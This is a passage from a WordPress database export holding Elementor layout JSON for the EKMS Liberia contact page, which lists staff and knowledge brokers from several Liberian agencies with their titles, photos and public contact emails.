nline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0080713\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"369beaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Albert M. Sherman <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:itssherman@gmail.com\\\">itssherman@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e5b0622\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Amos Borbor <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:felixborbor@gmail.com\\\">felixborbor@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58a8bc8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c7ec2c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry A. Simpson <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:ransford2024@gmail.com\\\">ransford2024@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c5ecaba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>James Kollie <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:jameskollie@yahoo.com\\\">jameskollie@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"308cd55\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Eric Pervist <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:gendermedia1@gmail.com\\\">gendermedia1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcdddb1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"98f890d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c45b21c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"1205269\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ace9d4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"765a1b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6893e76\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"237d9e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d02417\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>N. Mamatu G. King <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:kingmamatu@gmail.com\\\">kingmamatu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9d523fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d8aba5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J. Josiah N. Domah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:josiahdomah@@gmail.com\\\">josiahdomah@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"be454e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b64ac2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Emmanuel Ballah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:ballah_@yahoo.com\\\">ballah_@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(24585,3630,'_elementor_edit_mode','builder'),(24586,3630,'_elementor_template_type','wp-page'),(24587,3630,'_elementor_version','3.0.16'),(24588,3630,'_wp_page_template','default'),(24589,3630,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br 